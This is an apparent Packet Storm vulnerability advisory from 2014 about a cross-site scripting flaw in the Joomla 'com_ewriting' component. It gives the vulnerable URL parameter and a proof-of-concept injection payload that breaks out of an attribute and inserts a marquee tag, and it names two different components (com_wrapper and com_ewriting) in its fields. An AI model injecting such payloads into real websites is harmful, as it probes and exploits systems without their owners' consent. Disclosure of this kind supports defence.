Joomla EWriting Cross Site Scripting

2014-04-14T00:00:00
ID PACKETSTORM:126147
Type packetstorm
Reporter Renzi
Modified 2014-04-14T00:00:00

Description

                                        
                                            `# Cross Site Scripting on Joomla "com_ewriting"  
# Risk: Low  
# CWE number: CWE-79  
# Date: 14/04/2014  
# Project: www.joomla.org  
# Author: Felipe " Renzi " Gabriel  
# Contact: renzi@linuxmail.org  
# Tested on Windows 8 pro  
# Vulnerable File: index.php?option=com_wrapper&itemid=  
# Exploit:  
  
-Target: http://site.com  
-Vuln. file: /index.php?option=com_ewriting&itemid=  
-Exploit: "><marquee>Vulnerable</marquee>  
  
  
  
`